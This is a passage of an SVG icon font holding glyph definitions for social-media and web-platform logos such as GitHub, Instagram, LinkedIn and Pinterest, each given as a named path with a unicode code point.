<glyph glyph-name="friendfeed" horiz-adv-x="1000" unicode="&#xed3c;" d="M938 621h-131c-25 0-53-33-53-79v-76h154v-154h-154v-385h-154v385h-230v-385h-154v385h-153v154h153v76c0 128 93 231 207 231h130v-152h-130c-25 0-53-33-53-79v-76h230v76c0 128 93 231 207 231h131v-152z" />
<glyph glyph-name="ghost" horiz-adv-x="1000" unicode="&#xed3d;" d="M63 461h875v-222h-875v222z m0 327h537v-187h-537v187z m688 0h187v-185h-187v185z m-688-675h364v-201h-364v201z m515 0h360v-201h-360v201z" />
<glyph glyph-name="github" horiz-adv-x="1000" unicode="&#xed3e;" d="M738 785c-78-49-158-8-217 0-256 34-338-266-151-386-48-25-45-152 7-170-122-14-144-185-79-255 79-85 323-79 395 0 50 56 56 170 13 222-40 48-240 56-237 131 2 53 74 45 118 66 83 39 131 157 99 248 18 4 34 10 52 13v131z m-315-275c-96 210 221 195 125 0-32-23-94-25-125 0z m177-412c9-94-182-98-204-32-18 55 5 71 60 85 62 16 139 10 144-53z" />
<glyph glyph-name="gnome" horiz-adv-x="1000" unicode="&#xed3f;" d="M677 263c169 108 42 194 42 194-172 93-370-21-370-21-212-113-77-348-77-348 84-187 269-175 269-175 104-4 196 100 196 100 74 107-29 135-29 135-105 13-109-65-109-65 0-85-60-73-60-73-137 32-47 123-47 123l185 130z m137 517c-40 24-104-9-143-74-39-65-38-137 2-161s104 9 143 74c39 65 38 137-2 161z m-254-105c0-57-26-103-58-103s-59 46-59 103c0 56 27 102 59 102s58-46 58-102z m-203-149c29 6 45 48 35 93-10 46-41 78-70 72-29-7-44-48-35-94 10-46 41-77 70-71z m-109-1c-18 36-50 57-73 47-22-11-25-50-7-86 17-37 50-58 72-47s26 49 8 86z" />
<glyph glyph-name="google-buzz" horiz-adv-x="1000" unicode="&#xed40;" d="M938 383c0-74-30-144-79-200l-262 265 216 180c77-63 125-149 125-245z m-559-75l407 341c-77 53-177 85-286 85-159 0-298-68-375-170l254-256z m-198-165l172 144-247 250c-28-47-44-99-44-154 1-93 46-177 119-240z m655 16l-264 268-191-160-4-4-1-2-56-49h-2l-81-63-30-27c6-4 13-8 19-12-15-40-37-86-69-133 76-34 164 17 226 68 37-8 76-13 117-13 135 1 256 50 336 127z" />
<glyph glyph-name="google-hangouts" horiz-adv-x="1000" unicode="&#xed41;" d="M870 479c-14 72-45 136-96 190-21 22-44 42-71 59-48 31-101 50-159 57-7 1-14 1-21 3h-49c-1-2-2-1-3-1-13-1-26-3-38-5-92-18-168-63-227-136-48-60-74-129-80-206-3-37 0-74 8-111 6-27 15-53 27-78l3-6c20-40 46-75 78-105 17-16 36-31 55-43 60-38 126-58 198-59 4 0 5-1 5-6 0-38 0-76 0-115 0-1 0-3 0-5 1 1 2 1 3 2 72 33 138 76 196 129 12 11 23 22 34 34l14 15c7 7 13 16 20 24 8 9 14 19 21 29 16 22 29 45 41 69 5 12 11 24 16 37 0 0 0 0 0 1 13 34 22 70 26 106 2 13 3 26 4 39 1 27 0 55-5 82z m-402-123c-1-33-13-60-37-82-1-2-3-3-4-4-12-9-26-17-41-21-6-2-13-3-19-4-5 0-9 2-11 7 0 14 0 28 0 42 1 5-1 9 2 13 2 2 4 3 6 3 8 2 15 4 22 8 12 7 20 18 23 32l2 6c-30 1-60 1-89 1-3 0-5 0-8 0-8 2-13 9-13 17 0 45 0 90 0 135-1 8 0 14 6 19 3 3 7 5 11 5h131c12 0 22-12 18-23 1-2 1-5 1-7 0-49 0-98 0-147z m231 154c1-3 1-5 1-7v-148c0-43-28-85-69-101-1-1-2-1-3-2 1-1 2-1 3-1-1 0-2 0-3 1 0 0-1 0-1 0-1-1-1-1-1-1-9-2-17-4-26-6-7-1-12 3-12 10 0 5 0 9 0 14 0 8 0 17 0 25l0 6c0 6 3 9 11 11 10 2 20 6 27 13 10 9 15 20 17 32l-83 1h-9c-11 0-18 7-18 19l0 133c0 1 0 1 0 1-1 9 1 16 8 20 3 2 6 3 10 3h130c12 0 22-12 18-23z" />
<glyph glyph-name="google-map" horiz-adv-x="1000" unicode="&#xed42;" d="M788 570c-3 11-10 24-14 35-56 134-179 183-278 183-132 0-277-89-297-272v-37c0-2 1-16 1-23 11-87 80-179 131-267 56-93 113-185 170-277 35 60 70 121 104 179 9 17 20 35 29 51 7 11 18 22 24 32 55 101 144 203 144 303v41c0 11-14 49-14 52z m-289-188c-39 0-82 20-103 73-3 9-2 26-2 28v24c0 68 58 99 108 99 62 0 111-49 111-112s-52-112-114-112z" />
<glyph glyph-name="google-plus" horiz-adv-x="1000" unicode="&#xed43;" d="M341 628c-154 0-278-124-278-278s124-279 278-279c161 0 267 113 267 272 0 19 0 33-4 47h-263v-96h158c-7-41-48-120-158-120-95 0-173 79-173 176s78 176 173 176c54 0 90-23 111-43l76 72c-49 46-112 73-187 73z m437-159v-79h-79v-80h79v-79h80v79h80v80h-80v79h-80z" />
<glyph glyph-name="google-talk" horiz-adv-x="1000" unicode="&#xed44;" d="M938 439c0 192-196 349-438 349-242 0-437-157-437-349 0-167 147-307 345-341-5-56-16-120-41-186 97 26 181 113 240 189 190 38 331 175 331 338z m-250-215c-6-1-12-2-18-3-6 0-13-1-19-1-6 0-11 1-17 1 69 50 114 129 114 218 0 98-54 184-135 231 13 3 25 4 38 4 116 0 210-102 210-227 0-112-75-204-173-223z" />
<glyph glyph-name="hype-machine" horiz-adv-x="1000" unicode="&#xed45;" d="M500 710c-242 0-437-147-437-329 0-97 56-185 146-245-8-46-23-101-53-146 38 0 136 45 205 80 44-11 90-17 139-17 242 0 438 147 438 328 0 182-196 329-438 329z m209-333c-1-7-4-13-8-20-8-15-19-29-31-39-62-65-170-137-170-137s-109 72-170 137c-13 10-23 24-31 39-5 7-7 13-9 20-4 13-6 27-6 41 0 73 58 132 131 132 49 0 85-53 85-88 0 35 18 88 85 88 72 0 131-59 131-132 0-14-2-28-7-41z" />
<glyph glyph-name="instagram" horiz-adv-x="1000" unicode="&#xed46;" d="M499 607c-141 0-257-115-257-256 0-142 116-257 257-257 142 0 257 115 257 257 0 141-115 256-257 256z m0-415c-87 0-159 71-159 159 0 87 72 158 159 158 88 0 159-71 159-158 0-88-71-159-159-159z m210 653h-420c-157 0-284-128-284-285v-419c0-157 127-285 284-285h420c157 0 285 128 285 285v419c0 157-128 285-285 285z m187-704c0-103-84-187-187-187h-420c-103 0-186 84-186 187v419c0 103 83 187 186 187h420c103 0 187-84 187-187v-419z m-136 541c-37 0-68-31-68-68 0-37 30-67 68-67 37 0 67 30 67 67s-30 68-67 68z" />
<glyph glyph-name="kakaotalk" horiz-adv-x="1000" unicode="&#xed47;" d="M869 788h-738c-38 0-68-31-68-69v-738c0-38 30-69 68-69h738c38 0 69 31 69 69v738c0 38-31 69-69 69z m-369-684c-21 0-43 2-63 4-21-14-139-97-150-99 0 0-5-2-9 1l-3 8c1 8 31 110 36 129-100 49-166 137-166 237 0 155 159 281 355 281s356-126 356-281-160-280-356-280z m-124 344c0 11-9 20-20 20h-105c-11 0-20-9-20-20s9-20 20-20h32v-122c0-11 9-20 21-20s20 9 20 20v122h32c11 0 20 9 20 20z m76 0c-3 10-14 20-27 20-14 0-24-10-28-20l-49-129c-6-19 0-27 5-29 4-2 9-3 13-3 9 0 15 3 17 9l11 27h62l10-27c2-6 9-9 17-9 5 0 9 1 13 3 6 2 11 9 5 29l-49 129z m-7-89h-41l21 58 20-58z m155-32h-44v120c0 12-9 21-20 21s-21-9-21-21v-139c0-10 8-19 19-19h66c11 0 20 9 20 19s-9 19-20 19z m106 60l47 47c3 3 5 7 4 12 0 5-2 9-6 13-4 4-9 6-14 6-4 0-8-1-11-4l-57-58v44c0 12-10 21-21 21s-20-9-20-21v-140c0-11 9-20 20-20s21 9 21 20v45l7 7 48-64c4-5 10-8 16-8 5 0 9 1 12 4 5 3 8 8 8 14s0 10-3 15l-51 67z" />
<glyph glyph-name="kickstarter" horiz-adv-x="1000" unicode="&#xed48;" d="M885 788h-770c-29 0-52-24-52-53v-770c0-29 23-53 52-53h770c29 0 53 24 53 53v770c0 29-24 53-53 53z m-194-654c-15-15-34-23-56-23-23 0-41 8-54 23l-118 148v-82c0-23-4-41-12-54-15-23-36-35-64-35-26 0-46 9-60 26-13 16-19 37-19 63v302c0 25 6 45 20 62 14 17 33 25 58 25 23 0 43-8 58-25 9-10 15-19 17-29 1-6 2-17 2-34v-75l88 127c16 24 38 36 64 36 21 0 40-7 55-23 16-15 24-33 24-54 0-16-4-30-12-41l-80-115 97-123c10-12 15-27 15-43 0-22-8-40-23-56z" />
<glyph glyph-name="kik" horiz-adv-x="1000" unicode="&#xed49;" d="M887 355c-28 0-50-23-50-51 0-27 22-50 50-50 28 0 51 23 51 50 0 28-23 51-51 51z m-405 48h-1l0 2c0 25-20 45-45 45s-45-20-45-45c0-1 0-1 0-1h0l-1-228h1c0-25 20-45 45-45s45 20 45 45h1l0 227z m-153-200l-83 111 60 59-1 0c8 8 13 20 13 32 0 25-21 45-46 45-13 0-25-5-34-15l0 0-84-82 0 168h-1l0 2c0 25-20 46-45 46-24 0-45-21-45-46l1-2h-2v-344h1v-1c0-25 20-45 45-45 24 0 43 19 45 43h0v59l23 21 75-100c8-14 23-23 39-23 25 0 46 21 46 46 0 9-3 18-8 25l1 1z m483 0l-83 111 59 59 0 0c8 8 12 20 12 32 0 25-20 45-45 45-13 0-25-5-34-15l0 0-84-82-1 168h0l0 2c0 25-20 46-45 46s-45-21-45-46l0-1h-1v-345h1v0c0-25 20-46 45-46 24 0 43 19 44 43h1v59l23 22 75-101c8-14 23-23 39-23 25 0 46 21 46 46 0 9-3 18-8 25l1 1z" />
<glyph glyph-name="kiwibox" horiz-adv-x="1000" unicode="&#xed4a;" d="M452 762l-389-229 146-487 420-108 309 221v504l-486 99z m428-136l-301-228-56 16-16 102c8-15 23-32 38-30 25 3 30 55 30 55 7 60-34 57-43 56-5-1-25-4-34-21l-21 129 403-79z m-335-358l-19 124 46-13 13-120-40 9z m-13-54c-3 0-15 1-10 19 0 0 4 15 12 15 8-1 12-17 12-17 3-18-12-18-14-17z m23 350c0-2-1-13-7-15-9-3-13 4-13 4-12 20 9 24 6 23 2 1 14 3 14-12z m-97 136l43-280-355 97 312 183z m-327-200l374-102 19-129 0 1c-12 0-22-12-29-24l-243-149-121 403z m140-415l211 129c-12-54 28-57 37-57 7 0 54 0 41 59 1 0-3 16-10 30l37-8 26-241-342 88z m363-83l-26 232 16-3c1-7 2-11 2-11 17-58 55-38 63-33 3 2 17 11 21 26l170-35-246-176z m32 260c5 4 16-6 16-6 11-11 1-18-1-19-2-1-11-6-16 9 0 0-5 13 1 16z m228-64l-185 36c-2 7-8 16-17 25 1 0-37 38-59 26-10-6-12-20-12-33l-15 3-14 127 302 231 0-415z m-497 135c-1 0 52 13 52 38s-53 39-52 39c-59 14-61-28-61-37 0-7 2-55 61-40z m8 65c0 0 16-4 16-11s-16-12-16-12c-18-4-18 10-18 12 0 3 0 16 18 11z m0-95c-55-26-30-60-24-67 4-5 35-41 72 7 0-1 30 45 14 64-15 20-63-4-62-4z m41-25c-12-15-22-4-23-2-2 3-11 14 8 22-1 0 15 8 20 2 5-7-5-22-5-22z m281 80c0 0-54 0-60-24-6-24 42-51 42-51 53-27 65 13 67 22 2 7 11 53-49 53z m33-30c-1-2-4-14-20-6 0 0-14 8-12 15 1 7 17 7 17 7 18 0 15-14 15-16z m-30 51c59 10 44 50 41 58-3 7-23 49-72 13 1 0-43-32-33-55 10-23 64-16 64-16z m-2 64c14 10 19-1 20-3 1-3 5-14-11-16 0 0-15-2-18 4-3 6 9 15 9 15z m-126 28c22-12 59 20 62 24 42 45 6 67-3 71-5 4-48 25-64-33 0 0-16-50 5-62z m33 77c5 16 17 8 19 7 2-1 11-7 0-18-1-1-11-8-16-5-8 5-3 15-3 16z m-174-28c-41 44-66 10-71 2-4-6-28-46 29-66-1 0 48-21 62 0 13 21-12 55-20 64z m-7-21c-4-6-18 0-18 0-17 6-9 18-8 19 1 3 9 13 21 0 2-3 9-13 5-19z" />
<glyph glyph-name="line-messenger" horiz-adv-x="1000" unicode="&#xed4b;" d="M795 850h-590c-113 0-205-92-205-205v-590c0-113 92-205 205-205h590c113 0 205 92 205 205v590c0 113-92 205-205 205z m16-614c-1-2-4-5-7-8l0-1c-12-14-25-27-40-39-101-94-268-206-290-189-19 15 31 89-27 101-4 0-8 1-12 1h0c-86 13-162 49-216 100-54 51-87 117-87 190 0 162 165 293 367 293 203 0 367-131 367-293 0-57-20-110-55-155z m-395 241h-2c-11 0-19-9-19-19v-142c0-10 8-19 19-19h2c10 0 19 9 19 19v142c0 10-9 19-19 19z m-56-140h-53v121c0 10-9 19-19 19h-2c-10 0-19-9-19-19v-142c0-10 9-19 19-19h74c11 0 19 9 19 19v2c0 10-8 19-19 19z m229 140h-2c-10 0-19-9-19-19v-83l-69 92c-3 6-10 10-17 10h-1c-11 0-19-8-19-19v-142c0-10 8-19 19-19h1c11 0 19 9 19 19v85l70-95c1-1 1-1 2-2 1-3 4-4 7-6 2 0 5-1 7-1h2c3 0 6 1 9 2 2 1 3 2 4 4 4 3 6 8 6 13v142c0 10-9 19-19 19z m137 0h-74c-11 0-20-9-20-19v-142c0-11 9-19 20-19h74c10 0 19 8 19 19v1c0 11-9 19-19 19h-54v31h54c10 0 19 8 19 19v1c0 11-9 20-19 20h-54v30h54c10 0 19 8 19 19v2c0 10-9 19-19 19z" />
<glyph glyph-name="line" horiz-adv-x="1000" unicode="&#xed4c;" d="M502 766c136-4 258-44 353-150 104-115 111-270 13-391-97-122-225-208-361-282-11-6-25-14-37-6-15 10-6 27-4 41 12 66 7 73-56 86-86 18-165 49-232 107-151 132-154 337-6 473 92 85 204 119 330 122z m79-365c-2-2-5-3-7-4-26 33-51 66-76 100-8 10-17 18-30 14-14-4-17-16-17-28-1-52-1-103-1-155 1-16 6-31 24-30 18 0 23 14 23 31 0 27 0 54 0 81 33-31 58-64 83-97 8-10 16-19 30-15 14 5 16 16 16 29v155c0 16-4 31-23 30-20-1-21-17-22-32 0-27 0-53 0-79z m76 6h0c0-26 0-53 0-79 0-16 6-30 24-31 29-2 58-2 87 0 13 1 22 10 21 24-1 12-10 19-21 20-14 2-29 2-44 2-14 0-21 5-21 21 1 14 8 17 20 17 14 0 27 0 40 1 15 1 26 7 26 24 0 15-12 20-24 22-10 1-21 0-32 1-14 0-30-4-30 20 1 24 19 16 32 18 9 1 19 0 28 0 14 2 26 7 26 24 0 15-11 19-24 22-86 19-108 2-108-86 0-6 0-13 0-20z m-439-2c0-25 0-50 0-76 0-17 7-32 27-33 27-1 55-1 83 1 12 1 23 9 23 23 0 14-11 20-24 22-8 1-16 2-24 1-33-6-40 11-38 40 2 31 0 61 0 92 0 18-1 37-24 37-22-1-23-19-23-35 0-24 0-48 0-72z m153 5c0-28 0-56 1-84 0-16 7-30 25-28 15 1 22 13 22 28 0 53 0 106-1 159 0 16-7 27-23 27-17 0-23-12-23-27-1-25 0-50-1-75z" />
<glyph glyph-name="linkedin" horiz-adv-x="1000" unicode="&#xed4d;" d="M871 788h-741c-36 0-65-28-65-63v-750c0-35 29-63 65-63h741c35 0 64 28 64 63v750c0 35-29 63-64 63z m-542-733h-131v395h131v-395z m-66 449h-1c-44 0-72 30-72 68 0 39 29 69 74 69 45 0 73-30 73-69 0-38-28-68-74-68z m539-449h-131v212c0 53-19 89-66 89-37 0-58-25-68-48-3-9-4-20-4-32v-221h-131s1 358 0 395h131v-56c17 27 49 65 118 65 87 0 151-56 151-177v-227z" />
<glyph glyph-name="linux-mint" horiz-adv-x="1000" unicode="&#xed4e;" d="M640 742h-577v-254h99v-253c0-126 129-277 255-277h519l2 506c0 131-129 278-298 278z m231-648c0-37-47-71-83-71h-338c-93 0-211 92-211 189l-1 286c0 31-30 65-60 65h-49v112h509c105 0 233-109 233-214v-367z m-244 410c-75 77-188 6-188-60l1-178 66 0v163c0 59 89 58 89 0v-163l66 0 0 163c1 55 87 54 87-2l2-190c0-31-29-71-60-71l-258 0c-35 0-73 40-73 75v359h-65v-359c0-60 54-140 128-141l289-1c54 0 106 70 106 125l0 226c0 66-136 125-190 54z" />
<glyph glyph-name="live-messenger" horiz-adv-x="1000" unicode="&#xed4f;" d="M0 261c17 155 145 209 164 216-32 26-52 64-52 107 0 76 62 138 140 138s140-62 140-138c0-42-20-81-51-106 26-9 52-23 75-41-61-31-195-119-216-309v-4c-118 7-130 39-130 39-7 8-13 16-17 28-17 4-28 14-28 14s-26 10-25 56z m492 171c-27-11-217-92-242-320-2-69 37-84 37-84s16-15 42-21c5-16 13-30 25-41 0 0 18-50 207-59 2 0 5-1 8-1h119c4 1 9 1 14 2 193 13 213 73 213 73v0c6 8 10 16 13 26 88 18 81 122 55 203-37 111-130 188-228 223 47 37 76 94 76 158 0 112-93 204-208 204s-208-92-208-204c0-64 30-122 77-159z" />
<glyph glyph-name="livejournal" horiz-adv-x="1000" unicode="&#xed50;" d="M829-65c-1 0-2 1-3 1l-296 124c-2 1-4 3-4 5-1 3 0 6 2 7 34 33 53 78 53 125 0 20-4 40-10 58-1 1-1 2-1 3l-216 290c-43-38-84-94-80-149 1-4-2-8-7-8-4 0-8 3-8 7-5 65 46 131 96 171 61 47 127 68 172 53 4-1 6-6 5-10s-6-6-10-5c-40 13-101-6-156-50l221-295c57-35 133-34 188 4 3 2 5 2 8 1 2-1 4-3 4-6l50-317c0-2-1-5-3-7-1-1-3-2-5-2z m-282 135l272-114-45 291c-55-32-127-35-183-5 3-15 5-30 5-45 0-48-17-93-49-127z m-339 404c-4 0-7 4-8 7-5 66 46 131 97 171 60 48 126 68 171 53 4-1 6-5 5-9-2-4-6-7-10-5-40 13-101-7-157-51-47-37-95-98-90-157 0-5-3-8-7-9h-1z m520-488c11 38 43 68 83 76l18-119-101 43z m-345 771c-100 0-256-142-200-242l331-440 315-132-54 345-331 438c-14 22-36 31-61 31z m0 31c37 0 67-16 86-44l331-438c3-4 5-9 6-14l54-344c1-11-3-22-12-29-5-4-12-7-19-7-4 0-8 1-12 3l-314 131c-5 3-10 6-13 10l-332 441c0 1-1 2-2 3-24 43-20 95 10 147 45 77 143 141 217 141z" />
<glyph glyph-name="magento" horiz-adv-x="1000" unicode="&#xed51;" d="M131 138v424l369 226 369-224v-426l-95-55v422l-272 169-272-172v-420l-99 56z m318 386v-495l53-29 52 32v492l120-78v-429l-173-105-171 107v428l119 77z" />
<glyph glyph-name="meetme" horiz-adv-x="1000" unicode="&#xed52;" d="M316 492c22-13 49-14 73-4 36 15 59 56 51 94-6 40-45 72-86 70-22 1-42-10-58-24-17-18-28-44-25-70 2-27 20-54 45-66z m333-54c24-16 57-17 84-5 28 16 49 46 47 78 1 45-40 86-85 84-21 2-39-9-56-18-12-14-24-30-27-48-9-34 7-72 37-91z m278-199c-13 18-37 25-57 19-16-6-28-17-42-25-79-46-168-78-259-79-71-3-143 13-207 45-75 36-141 90-191 156-10 11-17 25-30 33-17 9-38 8-54-1-24-16-33-52-15-75 79-111 193-199 324-239 78-25 163-31 244-18 96 14 188 51 268 105 15 8 25 22 29 38 1 14 0 30-10 41z" />
<glyph glyph-name="meetup" horiz-adv-x="1000" unicode="&#xed53;" d="M905 642h-811c-17 0-31-18-31-37v-510c0-19 14-37 31-37h811c18 0 33 18 33 37v510c0 19-15 37-33 37z m25-505h-853v355h853v-355z m-763 99c4 1 9 2 13 4 9 2 14 7 12 17-2 8-2 16-3 25 6-7 10-14 14-21 9-17 20-27 41-22 10 2 14 5 15 14 1 13 1 27 2 40 1 11 2 23 3 37 9-31 18-59 28-86 6-19 11-21 30-13 2 1 4 2 6 3-11 48-23 95-34 142-4 20-8 24-28 26l-7 0c-6 0-10-2-13-8-12-28-21-56-25-87-10 19-20 39-31 58-5 9-35 11-42 2-1-1-1-3-1-4 2-39 3-78 5-116 0-9 6-12 15-11z m563 12c3-5 6-11 7-16l10-65c1-3 5-7 7-7 9-1 17-1 26-1 0 4-1 6-1 8-3 21-6 42-8 62 0 4 3 11 6 11 22 7 37 23 53 39 20 19 25 44 21 70-2 15-9 27-25 31-5 1-9 4-13 4-8 1-18 2-25-1-15-8-27-20-32-36-7-21-11-43-16-64-2-8 1-16-10-20-7-3-4-10 0-15z m81 112c13-33-3-69-37-88 6 33 11 65 37 88z m-459-125c18-11 70-7 82 6-11 10-20 12-34 6-15-5-25-3-31 11-5 11-5 23-7 37 15-1 27-3 38-3 8 0 16-2 16 11-1 20 0 41-1 61-1 16-30 32-44 23-21-12-38-28-42-54-2-15-1-31-3-46-2-23 7-39 26-52z m22 114c1 0 2 0 2 0v-34c0 1-8 1-14 2 4 11 8 22 12 32z m81-109c23-11 47-13 71-1 3 2 8 6 7 8-1 3-5 8-8 9-3 2-8 0-11-2-9-8-27-11-37-6-12 8-19 24-15 38h45c2 22 3 36 5 52 1 12 3 24 4 37 0 4-3 10-6 11-8 5-18 8-27 10-4 1-9-1-12-4-6-4-12-10-17-16-20-27-27-58-27-91 0-21 10-37 28-45z m24 109c1 0 2 0 3 0v-43c-7 0-10 1-17 2 5 14 9 27 14 41z m56-53c7-1 15-1 23-2 1-12 2-23 3-34 1-12 3-23 4-37 8 2 17 3 24 5v67c14 3 25 5 41 8-8 8-13 13-18 18-12 12-15 11-23-3-1 3-1 7-1 10 0 4 1 9 1 13-1 28-3 55-2 83 0 17-2 23-18 28-14 4-19 0-21-13-1-5-2-10-1-14 1-25 4-50 6-74 1-12 2-23 3-36-8 0-15 2-21 1-4-1-9-6-10-10-2-6 3-10 10-10z m107-48c7-19 43-22 55-5 10 12 22 24 28 37 6 14 9 29 9 44 0 5-13 11-20 15-4 2-11 3-13 0-3-3-4-9-4-14 2-27-1-53-26-75-1 21-3 40-3 58-1 25-1 26-24 35-10 3-15 1-15-10 0-10 0-19 1-28 3-19 6-39 12-57z" />
<glyph glyph-name="mixx" horiz-adv-x="1000" unicode="&#xed54;" d="M938 471v210h-875v-661h211v449h120v-449h212v449h120v-449h211l1 451z" />
<glyph glyph-name="newsvine" horiz-adv-x="1000" unicode="&#xed55;" d="M531 223l104 75c10-6 21-9 33-9 35 0 62 28 62 62 0 34-27 62-62 62s-62-28-62-62c0-3 1-5 1-8l-76-55v172l105 77c10-6 21-9 32-9 35 0 62 28 62 62s-27 62-62 62-62-28-62-62c0-3 1-6 1-9l-76-55v262h-61v-139l-77 56c1 4 1 8 1 12 0 34-27 61-62 61s-62-27-62-61 28-62 62-62c11 0 21 2 30 7l108-78v-172l-77 55c1 4 1 7 1 11 0 34-27 62-62 62s-61-28-61-62c0-35 27-62 61-62 12 0 22 3 31 8l107-78v-184l-77 56c1 3 1 7 1 10 0 34-28 62-62 62s-62-28-62-62 28-62 62-62c12 0 22 3 31 8l107-77v-185h60v61l105 76c10-6 21-10 33-10 34 0 62 28 62 62s-27 62-62 62-62-28-62-62c0-2 0-5 1-7l-77-55 1 184z" />
<glyph glyph-name="nimbuss" horiz-adv-x="1000" unicode="&#xed56;" d="M62 329v41c2 13 3 25 5 37 12 92 49 172 113 240 70 75 156 120 257 135 14 2 29 4 43 6h41c3-1 6-2 9-2 17-2 35-4 52-7 236-45 391-271 348-507-45-253-299-412-547-343-167 46-290 186-315 359-2 14-4 28-6 41z m347 117l3 1c4-9 8-18 12-27l145-281c4-7 9-9 17-9 27 0 54 0 82 0 8 0 10 3 10 11 0 139 0 277 1 416 0 8-3 11-11 11-24 0-47 0-70 0-11 0-12-1-13-13 0-27 1-54 0-81-1-71 5-141 12-214-3 6-5 10-7 15-41 99-97 190-147 285-3 6-7 8-13 8-32 0-64 0-95 0-10 0-12-1-12-12 0-138 1-277 0-416 0-8 3-10 11-10 24 0 48 0 72 0 12 0 13 0 13 12 0 48 0 96-1 144-1 29-3 58-5 88-1 24-2 48-4 72z" />
<glyph glyph-name="odnoklassniki" horiz-adv-x="1000" unicode="&#xed57;" d="M500 336c125 0 226 101 226 226 0 124-101 226-226 226s-226-102-226-226c0-125 102-226 226-226z m0 319c52 0 94-42 94-93 0-52-42-94-94-94s-93 42-93 94c0 51 42 93 93 93z m91-503c46 10 91 28 132 54 30 20 40 60 20 91-19 31-60 41-91 21-92-58-212-58-304 0-31 20-72 10-91-21-20-31-10-71 21-91 40-25 85-44 131-54l-127-126c-25-26-25-68 0-94 13-13 30-20 47-20 17 0 34 7 47 20l124 124 124-124c26-26 68-26 94 0 26 26 26 68 0 93l-127 127z" />
<glyph glyph-name="opencart" horiz-adv-x="1000" unicode="&#xed58;" d="M294 160c-35 0-63-27-63-62 0-34 28-62 63-62 34 0 62 28 62 62 0 35-28 62-62 62z m284 0c-35 0-63-27-63-62 0-34 28-62 63-62 34 0 62 28 62 62 0 35-28 62-62 62z m359 317c0 25-48 36-48 36-41 12-117 14-117 14-32 2-153 2-153 2-23-1-164 4-164 4-80 2-152 13-152 13-91 14-129 35-129 35-43 19-81 54-81 54-2 1-31 29-31 29 11-17 28-46 28-46 13-21 34-43 34-43 46-48 121-72 121-72 64-23 170-31 170-31 39-6 191-4 191-4 5 0 56-1 56-1 58-1 105-11 105-11 57-11 58-37 58-37 3-33-45-78-45-78-10-11-60-63-60-63-4-4-22-25-22-25-19-23-30-43-30-43 6 6 84 73 84 73 4 3 66 56 66 56 21 18 70 64 70 64 55 46 49 74 49 74z" />
<glyph glyph-name="oscommerce" horiz-adv-x="1000" unicode="&#xed59;" d="M717 208c0-163-132-296-295-296s-296 133-296 296 132 296 296 296 295-133 295-296z m-293 316s75 185 286 130c0 0 173-51 164-245 0 0-7-129-134-192 0 0 7 127-93 224 0 0-87 88-223 83z m-104-17c-59 80-7 182-15 161 0 0 42 120 170 120 0 0 108 5 167-102 0 0-88 6-162-56 0 0-43-33-78-104-1 0-47-4-82-19z" />
<glyph glyph-name="pandora" horiz-adv-x="1000" unicode="&#xed5a;" d="M760 718c-54 46-130 70-225 70h-375v-31c120 0 135-20 135-169v-474c0-149-16-171-135-171v-30h384v30c-120 0-135 22-135 171v182h126c95 0 171 23 225 69 54 46 81 105 81 176 0 72-27 130-81 177z m-226-369h-125v385h125c118 0 180-81 180-193 0-112-62-192-180-192z" />
<glyph glyph-name="photobucket" horiz-adv-x="1000" unicode="&#xed5b;" d="M673 615c-50 33-106 48-168 48-61 0-117-16-167-48-1 1-3 0-4 0h-116v53h-102v-53h-53v-525h258c53-36 115-58 184-58 70 0 132 22 185 58h248v525h-265z m-525 21h37v-21h-37v21z m-36-497v427h167c-58-61-88-134-88-218 0-81 26-152 78-209h-157z m555-3c-47-36-100-53-162-53-61 0-114 17-161 53-10 9-18 16-25 24l-1 1c-53 52-78 113-78 188 0 74 25 136 78 188 12 13 26 24 41 35 43 28 92 43 146 43 55 0 104-15 146-43l1 0c15-10 28-22 41-34 53-53 78-115 78-189 0-74-25-136-78-188-9-9-17-18-26-25z m222 3h-147c52 57 78 128 78 209 0 84-29 157-88 218h157v-427z m-240 368c-45 45-100 68-164 68-14 0-25-11-25-25s11-24 25-24c51 0 93-18 129-53s54-79 54-130c0-13 10-24 24-24s24 11 24 24c0 64-22 119-67 164z" />
<glyph glyph-name="picasa" horiz-adv-x="1000" unicode="&#xed5c;" d="M321 159h572c-67-139-202-232-353-247h-80c-48 5-95 17-139 37v210z m359 589c-57 26-117 40-180 40-52 0-103-11-153-29 12-11 319-289 333-303v292z m-379-9c-147-76-238-225-238-390 0-37 5-76 15-114 12 11 381 346 388 353-7 7-160 146-165 151z m-26-764v377c-15-14-176-160-181-165 35-88 99-163 181-212z m452 748v-518h186c16 47 25 95 25 144 0 152-81 295-211 374z" />
<glyph glyph-name="pinterest" horiz-adv-x="1000" unicode="&#xed5d;" d="M521 788c-239 0-360-172-360-314 0-87 33-164 103-192 12-5 22-1 25 12 3 9 8 31 11 40 3 13 2 17-8 28-20 24-33 55-33 99 0 127 95 241 248 241 135 0 209-83 209-193 0-145-64-267-160-267-52 0-91 43-79 97 15 64 45 132 45 178 0 41-22 76-68 76-54 0-97-56-97-131 0-47 16-79 16-79s-55-233-65-274c-19-81-2-181-1-191 1-6 8-7 12-3 5 7 69 86 91 165 6 22 35 138 35 138 17-33 68-63 123-63 161 0 271 148 271 345 0 149-126 288-318 288z" />
<glyph glyph-name="prestashop" horiz-adv-x="1000" unicode="&#xed5e;" d="M453 96l-48 41s-23 13-40-10l-2-6s56-55 104-110c40-49 73-99 73-99l161 24s-1 50 11 106c5 22 6 48 4 72-3 38-15 76-29 81-22 8-29-2-25-20l2-22h-21s-1 58-30 57l-19-51h-18s3 54-27 54l-23-62h-17l-25 153s-1 17-21 15c-20-2-18-33-18-33l34-226-24 0-2 36z m285 581l-133-14s-12 142-166 123c-127-17-129-153-129-153l-110-11 58-561 124 13c-12 12-24 23-36 32 0 0-17 20 12 44 29 25 59 4 59 4l28-23-21 147s-12 54 36 64c0 0 40 5 45-33l15-87s31 28 62-3c0 0 35 32 68-7 0 0 42 35 71-26 11-22 16-50 17-76l61 6-61 561z m-419-40s9 105 81 131c0 0-60-54-55-129l-26-2z m34 4s6 124 88 133c79 10 120-98 120-114l-208-19z m220 23c-28 101-97 118-97 118 97-1 119-116 119-116l-22-2z" />
<glyph glyph-name="qik" horiz-adv-x="1000" unicode="&#xed5f;" d="M697-88h120c16 103 30 194 44 286 15 93 40 185 48 282 15 193-100 294-281 306-197 13-331-52-420-140-67-67-112-150-118-260-9-175 123-309 352-290 26 2 52 9 76 20 36 16 61 44 89 61-21-102-60-263 90-265z m-122 390c-36-25-119-40-172-8-93 58-36 239 33 291 19 14 43 24 77 28 27 3 75-3 97-18 81-55 41-239-35-293z" />
